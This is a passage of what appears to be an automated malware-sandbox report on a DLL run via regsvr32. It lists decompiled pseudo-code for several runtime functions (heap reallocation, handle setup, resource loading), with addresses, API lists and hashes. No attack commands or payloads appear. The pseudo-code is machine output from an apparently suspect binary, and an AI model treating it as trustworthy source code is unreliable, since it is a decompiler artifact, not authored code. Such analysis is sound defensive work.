								_t56 = 0;
								L57:
								return _t56;
							}
							L9:
							__eflags =  *(_t52 + 4);
							if( *(_t52 + 4) != 0) {
								_t13 =  &_a4;
								 *_t13 = _a4 + 1;
								__eflags =  *_t13;
							}
							_t81 = _t81 + 1;
							_t52 = _t52 + 0xc;
							__eflags = _t81 - _t88;
						} while (_t81 <= _t88);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t53 =  *0x1004f590; // 0x0
							_t91 = _t69 & 0xfffff000;
							_t93 = 0;
							__eflags = _t53;
							if(_t53 <= 0) {
								L18:
								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
								__eflags = _t55;
								if(_t55 == 0) {
									L56:
									_t56 = _t55 | 0xffffffff;
									__eflags = _t56;
									goto L57;
								}
								__eflags = _v36.Type - 0x1000000;
								if(_v36.Type != 0x1000000) {
									goto L56;
								}
								__eflags = _v36.Protect & 0x000000cc;
								if((_v36.Protect & 0x000000cc) == 0) {
									L28:
									_t57 = InterlockedExchange(0x1004f5d8, 1);
									__eflags = _t57;
									if(_t57 != 0) {
										goto L5;
									}
									_t75 =  *0x1004f590; // 0x0
									__eflags = _t75;
									_t82 = _t75;
									if(_t75 <= 0) {
										L33:
										__eflags = _t82;
										if(_t82 != 0) {
											L40:
											InterlockedExchange(0x1004f5d8, 0);
											goto L5;
										}
										_t70 = 0xf;
										__eflags = _t75 - _t70;
										if(_t75 <= _t70) {
											_t70 = _t75;
										}
										_t83 = 0;
										__eflags = _t70;
										if(_t70 < 0) {
											L38:
											__eflags = _t75 - 0x10;
											if(_t75 < 0x10) {
												_t76 = _t75 + 1;
												__eflags = _t76;
												 *0x1004f590 = _t76;
											}
											goto L40;
										} else {
											do {
												_t60 = 0x1004f598 + _t83 * 4;
												_t83 = _t83 + 1;
												__eflags = _t83 - _t70;
												 *_t60 = _t91;
												_t91 =  *_t60;
											} while (_t83 <= _t70);
											goto L38;
										}
									}
									_t61 = 0x1004f594 + _t75 * 4;
									while(1) {
										__eflags =  *_t61 - _t91;
										if( *_t61 == _t91) {
											goto L33;
										}
										_t82 = _t82 - 1;
										_t61 = _t61 - 4;
										__eflags = _t82;
										if(_t82 > 0) {
											continue;
										}
										goto L33;
									}
									goto L33;
								}
								_t77 = _v36.AllocationBase;
								__eflags =  *_t77 - 0x5a4d;
								if( *_t77 != 0x5a4d) {
									goto L56;
								}
								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
								__eflags =  *_t55 - 0x4550;
								if( *_t55 != 0x4550) {
									goto L56;
								}
								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
								if( *((short*)(_t55 + 0x18)) != 0x10b) {
									goto L56;
								}
								_t71 = _t69 - _t77;
								__eflags =  *((short*)(_t55 + 6));
								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
								if( *((short*)(_t55 + 6)) <= 0) {
									goto L56;
								}
								_t63 =  *((intOrPtr*)(_t79 + 0xc));
								__eflags = _t71 - _t63;
								if(_t71 < _t63) {
									goto L28;
								}
								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
									goto L28;
								}
								__eflags =  *(_t79 + 0x27) & 0x00000080;
								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
									goto L41;
								}
								goto L28;
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 + 1;
								__eflags = _t93 - _t53;
								if(_t93 < _t53) {
									continue;
								}
								goto L18;
							}
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L5;
							}
							_t64 = InterlockedExchange(0x1004f5d8, 1);
							__eflags = _t64;
							if(_t64 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
							if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
								L53:
								_t80 = 0;
								__eflags = _t93;
								if(_t93 < 0) {
									L55:
									InterlockedExchange(0x1004f5d8, 0);
									goto L5;
								} else {
									goto L54;
								}
								do {
									L54:
									_t66 = 0x1004f598 + _t80 * 4;
									_t80 = _t80 + 1;
									__eflags = _t80 - _t93;
									 *_t66 = _t91;
									_t91 =  *_t66;
								} while (_t80 <= _t93);
								goto L55;
							}
							_t67 =  *0x1004f590; // 0x0
							_t43 = _t67 - 1; // -1
							_t93 = _t43;
							__eflags = _t93;
							if(_t93 < 0) {
								L49:
								__eflags = _t67 - 0x10;
								if(_t67 < 0x10) {
									_t67 = _t67 + 1;
									__eflags = _t67;
									 *0x1004f590 = _t67;
								}
								_t46 = _t67 - 1; // 0x0
								_t93 = _t46;
								goto L53;
							} else {
								goto L46;
							}
							while(1) {
								L46:
								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 - 1;
								__eflags = _t93;
								if(_t93 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t93;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L55;
								}
								goto L53;
							}
							goto L49;
						}
						_t68 =  *((intOrPtr*)(_t92 - 8));
						__eflags = _t68 - _v8;
						if(_t68 < _v8) {
							goto L41;
						}
						__eflags = _t68 - _t92;
						if(_t68 >= _t92) {
							goto L41;
						}
						goto L15;
					}
					L5:
					_t56 = 1;
					goto L57;
				} else {
					goto L3;
				}
			}

0x10014699
0x1001469c
0x100146a2
0x100146bf
0x00000000
0x100146bf
0x100146aa
0x100146ad
0x100146b0
0x100146b5
0x100146b8
0x100146c7
0x100146ca
0x100146cd
0x100146d7
0x100146d7
0x100146d9
0x100146dc
0x100146de
0x100146de
0x100146e0
0x100146e3
0x00000000
0x00000000
0x100146e5
0x100146e7
0x10014832
0x10014832
0x100148b5
0x00000000
0x100148b5
0x100146ed
0x100146ed
0x100146f1
0x100146f3
0x100146f3
0x100146f3
0x100146f3
0x100146f6
0x100146f7
0x100146fa
0x100146fa
0x100146fe
0x10014702
0x10014718
0x10014718
0x1001471f
0x10014725
0x10014727
0x10014729
0x1001473d
0x10014744
0x1001474a
0x1001474c
0x100148b2
0x100148b2
0x100148b2
0x00000000
0x100148b2
0x10014752
0x10014759
0x00000000
0x00000000
0x1001475f
0x10014763
0x100147bb
0x100147c2
0x100147c8
0x100147ca
0x00000000
0x00000000
0x100147d0
0x100147d6
0x100147d8
0x100147da
0x100147ef
0x100147ef
0x100147f1
0x10014820
0x10014827
0x00000000
0x10014827
0x100147f5
0x100147f6
0x100147f8
0x100147fa
0x100147fa
0x100147fc
0x100147fe
0x10014800
0x10014814
0x10014814
0x10014817
0x10014819
0x10014819
0x1001481a
0x1001481a
0x00000000
0x10014802
0x10014802
0x10014802
0x1001480b
0x1001480c
0x1001480e
0x10014810
0x10014810
0x00000000
0x10014802
0x10014800
0x100147dc
0x100147e3
0x100147e3
0x100147e5
0x00000000
0x00000000
0x100147e7
0x100147e8
0x100147eb
0x100147ed
0x00000000
0x00000000
0x00000000
0x100147ed
0x00000000
0x100147e3
0x10014765
0x10014768
0x1001476d
0x00000000
0x00000000
0x10014776
0x10014778
0x1001477e
0x00000000
0x00000000
0x10014784
0x1001478a
0x00000000
0x00000000
0x10014790
0x10014792
0x1001479b
0x1001479f
0x00000000
0x00000000
0x100147a5
0x100147a8
0x100147aa
0x00000000
0x00000000
0x100147b1
0x100147b3
0x00000000
0x00000000
0x100147b5
0x100147b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1001472b
0x1001472b
0x1001472b
0x10014732
0x00000000
0x00000000
0x10014738
0x10014739
0x1001473b
0x00000000
0x00000000
0x00000000
0x1001473b
0x10014836
0x10014838
0x00000000
0x00000000
0x1001484b
0x1001484d
0x1001484f
0x00000000
0x00000000
0x10014855
0x1001485c
0x1001488c
0x1001488c
0x1001488e
0x10014890
0x100148a4
0x100148ab
0x00000000
0x00000000
0x00000000
0x00000000
0x10014892
0x10014892
0x10014892
0x1001489b
0x1001489c
0x1001489e
0x100148a0
0x100148a0
0x00000000
0x10014892
0x1001485e
0x10014863
0x10014863
0x10014866
0x10014868
0x1001487a
0x1001487a
0x1001487d
0x1001487f
0x1001487f
0x10014880
0x10014880
0x10014885
0x10014885
0x00000000
0x00000000
0x00000000
0x00000000
0x1001486a
0x1001486a
0x1001486a
0x10014871
0x00000000
0x00000000
0x10014873
0x10014873
0x10014874
0x00000000
0x00000000
0x00000000
0x10014874
0x10014876
0x10014878
0x1001488a
0x00000000
0x00000000
0x00000000
0x1001488a
0x00000000
0x10014878
0x10014704
0x10014707
0x1001470a
0x00000000
0x00000000
0x10014710
0x10014712
0x00000000
0x00000000
0x00000000
0x10014712
0x100146cf
0x100146d1
0x00000000
0x00000000
0x00000000
0x00000000

APIs

VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,10010A4D,?), ref: 10014744
InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 100147C2
InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 10014827
InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 1001484B
InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 100148AB

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ExchangeInterlocked$QueryVirtual
String ID:
API String ID: 2947987494-0
Opcode ID: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
Instruction ID: 9d228fb4bd3535bae3d62daabf15c01b9b2423e99f84aa7b143aff86640a32b5
Opcode Fuzzy Hash: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
Instruction Fuzzy Hash: 3851C130A00A928FE718CF18C8D8A6C73E1EB46795F678169DA45DF2B1EF70DCC18A45

Uniqueness

Uniqueness Score: -1.00%

Function 1001614C Relevance: 7.7, APIs: 5, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1001614C() {
				void* __ebp;
				signed int _t51;
				signed int _t55;
				long _t59;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				void* _t69;
				signed int* _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed char _t89;
				signed int _t96;
				void* _t99;
				int _t101;
				void** _t103;
				void** _t105;
				signed int** _t106;
				intOrPtr* _t109;
				void* _t110;

				_t51 = E100107B6(0x480);
				if(_t51 != 0) {
					 *0x1004f920 = _t51;
					 *0x1004f90c = 0x20;
					_t1 = _t51 + 0x480; // 0x480
					_t84 = _t1;
					while(1) {
						__eflags = _t51 - _t84;
						if(_t51 >= _t84) {
							break;
						}
						 *_t51 =  *_t51 | 0xffffffff;
						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
						 *((char*)(_t51 + 4)) = 0;
						 *((char*)(_t51 + 5)) = 0xa;
						_t85 =  *0x1004f920; // 0x0
						_t51 = _t51 + 0x24;
						_t84 = _t85 + 0x480;
						__eflags = _t84;
					}
					GetStartupInfoA(_t110 + 0x14);
					__eflags =  *((short*)(_t110 + 0x46));
					if( *((short*)(_t110 + 0x46)) == 0) {
						L26:
						_t81 = 0;
						__eflags = 0;
						do {
							_t86 =  *0x1004f920; // 0x0
							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
							__eflags =  *_t103 - 0xffffffff;
							if( *_t103 != 0xffffffff) {
								_t49 =  &(_t103[1]);
								 *_t49 = _t103[1] | 0x00000080;
								__eflags =  *_t49;
								goto L42;
							}
							__eflags = _t81;
							_t103[1] = 0x81;
							if(_t81 != 0) {
								asm("sbb eax, eax");
								_t59 =  ~(_t81 - 1) + 0xfffffff5;
								__eflags = _t59;
							} else {
								_t59 = 0xfffffff6;
							}
							_t99 = GetStdHandle(_t59);
							__eflags = _t99 - 0xffffffff;
							if(_t99 == 0xffffffff) {
								L40:
								_t103[1] = _t103[1] | 0x00000040;
							} else {
								_t61 = GetFileType(_t99);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L40;
								}
								_t62 = _t61 & 0x000000ff;
								__eflags = _t62 - 2;
								 *_t103 = _t99;
								if(__eflags != 0) {
									__eflags = _t62 - 3;
									if(__eflags == 0) {
										_t42 =  &(_t103[1]);
										 *_t42 = _t103[1] | 0x00000008;
										__eflags =  *_t42;
									}
								} else {
									_t103[1] = _t103[1] | 0x00000040;
								}
								_push(0xfa0);
								_push( &(_t103[3]));
								_t64 = E10019599(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									L30:
									_t55 = _t64 | 0xffffffff;
									L44:
									return _t55;
								} else {
									_t103[2] = _t103[2] + 1;
									goto L42;
								}
							}
							L42:
							_t81 = _t81 + 1;
							__eflags = _t81 - 3;
						} while (_t81 < 3);
						SetHandleCount( *0x1004f90c);
						_t55 = 0;
						__eflags = 0;
						goto L44;
					}
					_t65 =  *(_t110 + 0x48);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L26;
					}
					_t101 =  *_t65;
					_t109 = _t65 + 4;
					 *(_t110 + 0x10) = _t101 + _t109;
					__eflags = _t101 - 0x800;
					if(_t101 >= 0x800) {
						_t101 = 0x800;
					}
					__eflags =  *0x1004f90c - _t101; // 0x20
					if(__eflags >= 0) {
						L18:
						_t82 = 0;
						__eflags = _t101;
						if(_t101 <= 0) {
							goto L26;
						} else {
							goto L19;
						}
						do {
							L19:
							_t69 =  *( *(_t110 + 0x10));
							__eflags = _t69 - 0xffffffff;
							if(_t69 == 0xffffffff) {
								goto L25;
							}
							_t89 =  *_t109;
							__eflags = _t89 & 0x00000001;
							if((_t89 & 0x00000001) == 0) {
								goto L25;
							}
							__eflags = _t89 & 0x00000008;
							if(__eflags != 0) {
								L23:
								_t105 = 0x1004f920[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
								 *_t105 =  *( *(_t110 + 0x10));
								_t105[1] =  *_t109;
								_push(0xfa0);
								_push( &(_t105[3]));
								_t64 = E10019599(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									goto L30;
								}
								_t31 =  &(_t105[2]);
								 *_t31 = _t105[2] + 1;
								__eflags =  *_t31;
								goto L25;
							}
							__eflags = GetFileType(_t69);
							if(__eflags == 0) {
								goto L25;
							}
							goto L23;
							L25:
							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
							_t82 = _t82 + 1;
							_t109 = _t109 + 1;
							__eflags = _t82 - _t101;
						} while (_t82 < _t101);
						goto L26;
					} else {
						_t106 = 0x1004f924;
						while(1) {
							_t78 = E100107B6(0x480);
							__eflags = _t78;
							if(_t78 == 0) {
								break;
							}
							 *0x1004f90c =  *0x1004f90c + 0x20;
							 *_t106 = _t78;
							_t12 =  &(_t78[0x120]); // 0x480
							_t96 = _t12;
							while(1) {
								__eflags = _t78 - _t96;
								if(_t78 >= _t96) {
									break;
								}
								 *_t78 =  *_t78 | 0xffffffff;
								_t78[2] = _t78[2] & 0x00000000;
								_t78[1] = 0;
								_t78[1] = 0xa;
								_t78 =  &(_t78[9]);
								_t96 =  &(( *_t106)[0x120]);
								__eflags = _t96;
							}
							_t106 =  &(_t106[1]);
							__eflags =  *0x1004f90c - _t101; // 0x20
							if(__eflags < 0) {
								continue;
							}
							goto L18;
						}
						_t101 =  *0x1004f90c; // 0x20
						goto L18;
					}
				}
				return _t51 | 0xffffffff;
			}

0x10016156
0x1001615e
0x10016168
0x1001616d
0x10016177
0x10016177
0x1001619d
0x1001619d
0x1001619f
0x00000000
0x00000000
0x1001617f
0x10016182
0x10016186
0x1001618a
0x1001618e
0x10016194
0x10016197
0x10016197
0x10016197
0x100161a9
0x100161af
0x100161b5
0x100162a4
0x100162a4
0x100162a4
0x100162a6
0x100162a6
0x100162af
0x100162b2
0x100162b5
0x10016326
0x10016326
0x10016326
0x00000000
0x10016326
0x100162b7
0x100162b9
0x100162bd
0x100162ce
0x100162d0
0x100162d0
0x100162bf
0x100162c1
0x100162c1
0x100162da
0x100162dc
0x100162df
0x10016320
0x10016320
0x100162e1
0x100162e2
0x100162e8
0x100162ea
0x00000000
0x00000000
0x100162ec
0x100162f1
0x100162f4
0x100162f6
0x100162fe
0x10016301
0x10016303
0x10016303
0x10016303
0x10016303
0x100162f8
0x100162f8
0x100162f8
0x1001630a
0x1001630f
0x10016310
0x10016315
0x10016319
0x100162c4
0x100162c4
0x10016342
0x00000000
0x1001631b
0x1001631b
0x00000000
0x1001631b
0x10016319
0x1001632a
0x1001632a
0x1001632b
0x1001632b
0x1001633a
0x10016340
0x10016340
0x00000000
0x10016340
0x100161bb
0x100161bf
0x100161c1
0x00000000
0x00000000
0x100161c7
0x100161c9
0x100161cf
0x100161d8
0x100161da
0x100161dc
0x100161dc
0x100161de
0x100161e4
0x10016234
0x10016234
0x10016236
0x10016238
0x00000000
0x00000000
0x00000000
0x00000000
0x1001623a
0x1001623a
0x1001623e
0x10016240
0x10016243
0x00000000
0x00000000
0x10016245
0x10016248
0x1001624b
0x00000000
0x00000000
0x1001624d
0x10016250
0x1001625d
0x10016271
0x1001627a
0x1001627f
0x10016285
0x1001628a
0x1001628b
0x10016290
0x10016294
0x00000000
0x00000000
0x10016296
0x10016296
0x10016296
0x00000000
0x10016296
0x10016259
0x1001625b
0x00000000
0x00000000
0x00000000
0x10016299
0x10016299
0x1001629e
0x1001629f
0x100162a0
0x100162a0
0x00000000
0x100161e6
0x100161e6
0x100161eb
0x100161ec
0x100161f1
0x100161f4
0x00000000
0x00000000
0x100161f6
0x100161fd
0x100161ff
0x100161ff
0x1001621d
0x1001621d
0x1001621f
0x00000000
0x00000000
0x10016207
0x1001620a
0x1001620e
0x10016212
0x10016218
0x1001621b
0x1001621b
0x1001621b
0x10016221
0x10016224
0x1001622a
0x00000000
0x00000000
0x00000000
0x1001622c
0x1001622e
0x00000000
0x1001622e
0x100161e4
0x00000000

APIs

GetStartupInfoA.KERNEL32(?), ref: 100161A9
GetFileType.KERNEL32(?), ref: 10016253
GetStdHandle.KERNEL32(-000000F6), ref: 100162D4

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FileHandleInfoStartupType
String ID:
API String ID: 2461013171-0
Opcode ID: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
Instruction ID: 1ab9cbaac9cb8a736ff2886ec947831f70add154915b3c09dc4dcc7ccc4cd674
Opcode Fuzzy Hash: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
Instruction Fuzzy Hash: 6C51F4716057429FD710CF68CC887267BE0EB4A364F258A6DD5A5CF2E2D734E889CB01

Uniqueness

Uniqueness Score: -1.00%

Function 1001234F Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1001234F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t30;
				long _t31;
				long _t33;
				void* _t36;
				long _t38;
				long _t41;
				long _t42;
				long _t44;
				long _t46;
				void* _t59;
				long _t61;
				void* _t67;
				void* _t68;

				_push(0x14);
				_push(0x10041dc0);
				E10012514(__ebx, __edi, __esi);
				_t59 =  *(_t67 + 8);
				if(_t59 != 0) {
					_t61 =  *(_t67 + 0xc);
					__eflags = _t61;
					if(__eflags != 0) {
						__eflags =  *0x10050a64 - 3;
						if( *0x10050a64 != 3) {
							while(1) {
								_t28 = 0;
								__eflags = _t61 - 0xffffffe0;
								if(_t61 <= 0xffffffe0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t28 = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
								}
								__eflags = _t28;
								if(_t28 != 0) {
									goto L37;
								}
								__eflags =  *0x1004f58c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								_t30 = E10014676(_t61);
								__eflags = _t30;
								if(_t30 != 0) {
									continue;
								}
								goto L36;
							}
							goto L37;
						} else {
							goto L5;
						}
						do {
							L5:
							 *(_t67 - 0x1c) = 0;
							__eflags = _t61 - 0xffffffe0;
							if(_t61 > 0xffffffe0) {
								L25:
								_t28 =  *(_t67 - 0x1c);
								__eflags =  *(_t67 - 0x1c);
								if( *(_t67 - 0x1c) != 0) {
									goto L37;
								}
								__eflags =  *0x1004f58c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								goto L27;
							}
							E10013A38(0, _t59, 4);
							 *(_t67 - 4) = 0;
							_t33 = E10013B9B(_t59);
							 *(_t67 - 0x20) = _t33;
							__eflags = _t33;
							if(_t33 == 0) {
								L21:
								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
								E100124B7();
								__eflags =  *(_t67 - 0x20);
								if( *(_t67 - 0x20) == 0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t61 = _t61 + 0x0000000f & 0xfffffff0;
									__eflags = _t61;
									 *(_t67 + 0xc) = _t61;
									 *(_t67 - 0x1c) = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
								}
								goto L25;
							}
							__eflags = _t61 -  *0x10050a50; // 0x0
							if(__eflags <= 0) {
								_push(_t61);
								_push(_t59);
								_push(_t33);
								_t41 = E1001409B();
								_t68 = _t68 + 0xc;
								__eflags = _t41;
								if(_t41 == 0) {
									_push(_t61);
									_t42 = E1001437A();
									 *(_t67 - 0x1c) = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
										 *(_t67 - 0x24) = _t44;
										__eflags = _t44 - _t61;
										if(_t44 >= _t61) {
											_t44 = _t61;
										}
										E10011440( *(_t67 - 0x1c), _t59, _t44);
										_t46 = E10013B9B(_t59);
										 *(_t67 - 0x20) = _t46;
										_push(_t59);
										_push(_t46);
										E10013BC6();
										_t68 = _t68 + 0x18;
									}
								} else {
									 *(_t67 - 0x1c) = _t59;
								}
							}
							__eflags =  *(_t67 - 0x1c);
							if( *(_t67 - 0x1c) == 0) {
								__eflags = _t61;
								if(_t61 == 0) {
									_t61 = 1;
									__eflags = 1;
									 *(_t67 + 0xc) = 1;
								}
								_t61 = _t61 + 0x0000000f & 0xfffffff0;
								 *(_t67 + 0xc) = _t61;
								_t36 = HeapAlloc( *0x10050a60, 0, _t61);
								 *(_t67 - 0x1c) = _t36;
								__eflags = _t36;
								if(_t36 != 0) {
									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
									 *(_t67 - 0x24) = _t38;
									__eflags = _t38 - _t61;
									if(_t38 >= _t61) {
										_t38 = _t61;
									}
									E10011440( *(_t67 - 0x1c), _t59, _t38);
									_push(_t59);
									_push( *(_t67 - 0x20));
									E10013BC6();
									_t68 = _t68 + 0x14;
								}
							}
							goto L21;
							L27:
							_t31 = E10014676(_t61);
							__eflags = _t31;
						} while (_t31 != 0);
						goto L36;
					} else {
						_push(_t59);
						E100107C8(0, _t59, _t61, __eflags);
						L36:
						_t28 = 0;
						__eflags = 0;
						goto L37;
					}
				} else {
					_t28 = E100107B6( *(_t67 + 0xc));
					L37:
					return E1001254F(_t28);
				}
			}

0x1001234f
0x10012351
0x10012356
0x1001235b
0x10012362
0x10012372
0x10012375
0x10012377
0x10012385
0x1001238c
0x100124c0
0x100124c0
0x100124c2
0x100124c5
0x100124c7
0x100124c9
0x100124cd
0x100124cd
0x100124cd
0x100124d7
0x100124d7
0x100124dd
0x100124df
0x00000000
0x00000000
0x100124e1
0x100124e7
0x00000000
0x00000000
0x100124ea
0x100124f0
0x100124f2
0x00000000
0x00000000
0x00000000
0x100124f2
0x00000000
0x00000000
0x00000000
0x00000000
0x10012392
0x10012392
0x10012392
0x10012395
0x10012398
0x1001248f
0x1001248f
0x10012492
0x10012494
0x00000000
0x00000000
0x10012496
0x1001249c
0x00000000
0x00000000
0x00000000
0x1001249c
0x100123a0
0x100123a6
0x100123aa
0x100123b0
0x100123b3
0x100123b5
0x1001245f
0x1001245f
0x10012463
0x10012468
0x1001246b
0x1001246d
0x1001246f
0x10012473
0x10012473
0x10012473
0x10012477
0x10012477
0x1001247a
0x1001248c
0x1001248c
0x00000000
0x1001246b
0x100123bb
0x100123c1
0x100123c3
0x100123c4
0x100123c5
0x100123c6
0x100123cb
0x100123ce
0x100123d0
0x100123d7
0x100123d8
0x100123de
0x100123e1
0x100123e3
0x100123e8
0x100123e9
0x100123ec
0x100123ee
0x100123f0
0x100123f0
0x100123f7
0x100123fd
0x10012402
0x10012405
0x10012406
0x10012407
0x1001240c
0x1001240c
0x100123d2
0x100123d2
0x100123d2
0x100123d0
0x1001240f
0x10012412
0x10012414
0x10012416
0x1001241a
0x1001241a
0x1001241b
0x1001241b
0x10012421
0x10012424
0x1001242f
0x10012435
0x10012438
0x1001243a
0x1001243f
0x10012440
0x10012443
0x10012445
0x10012447
0x10012447
0x1001244e
0x10012453
0x10012454
0x10012457
0x1001245c
0x1001245c
0x1001243a
0x00000000
0x1001249e
0x1001249f
0x100124a5
0x100124a5
0x00000000
0x10012379
0x10012379
0x1001237a
0x100124f4
0x100124f4
0x100124f4
0x00000000
0x100124f4
0x10012364
0x10012367
0x100124f6
0x100124fb
0x100124fb

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
Instruction ID: a1aac842a28fd1c9b1a5d11719d9853ed47685f9db5387583b2c03217e3948c7
Opcode Fuzzy Hash: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
Instruction Fuzzy Hash: A641F5F1D002669FCB20EF698C8489F7AB4EB417A47124129FA24AE151D734DDE0DB91

Uniqueness

Uniqueness Score: -1.00%

Function 100071BF Relevance: 7.6, APIs: 5, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E100071BF(intOrPtr* __ecx, void* _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t59;
				signed int _t61;
				signed int _t62;
				void* _t64;
				int* _t72;
				struct HWND__* _t73;
				intOrPtr _t78;
				struct HRSRC__* _t81;
				void* _t82;
				void* _t86;
				void* _t88;
				void* _t89;
				intOrPtr _t90;
				void* _t93;
				intOrPtr _t95;
				intOrPtr _t101;
				intOrPtr _t103;
				struct HINSTANCE__* _t105;
				intOrPtr* _t106;
				void* _t107;

				_t106 = __ecx;
				_v8 = 0;
				_v12 = 0;
				if(_a8 != 0) {
					_t105 =  *(E100373B5() + 0xc);
					_t81 = FindResourceA(_t105, _a8, 0xf0);
					if(_t81 != 0) {
						_t82 = LoadResource(_t105, _t81);
						_v12 = _t82;
						if(_t82 == 0) {
							return 0;
						}
						_v8 = LockResource(_t82);
					}
				}
				__eflags = _v8;
				_t86 = _a4;
				_t103 = _a12;
				_v16 = 1;
				if(_v8 != 0) {
					_t78 =  *((intOrPtr*)( *_t106 + 0x1c))(_t86, _v8, _t103);
					__eflags = _v12;
					_v16 = _t78;
					if(_v12 != 0) {
						FreeResource(_v12);
					}
				}
				_t59 =  *(_t86 + 0x48);
				__eflags = _t59;
				if(_t59 == 0) {
					L25:
					return _v16;
				} else {
					_t88 =  *(_t59 + 0x40);
					_a8 = _a8 & 0x00000000;
					__eflags = _t88;
					_a4 = _t88;
					_v12 = _t88;
					if(_t88 != 0) {
						_a8 =  *(E10006D96( &_a4));
					}
					_t61 = 0;
					__eflags =  *(_t103 + 8);
					_v8 = 0;
